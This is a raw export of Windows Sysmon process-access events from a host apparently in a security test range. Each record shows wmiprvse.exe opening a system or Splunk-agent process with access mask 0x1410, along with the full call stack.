15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.429{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.413{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 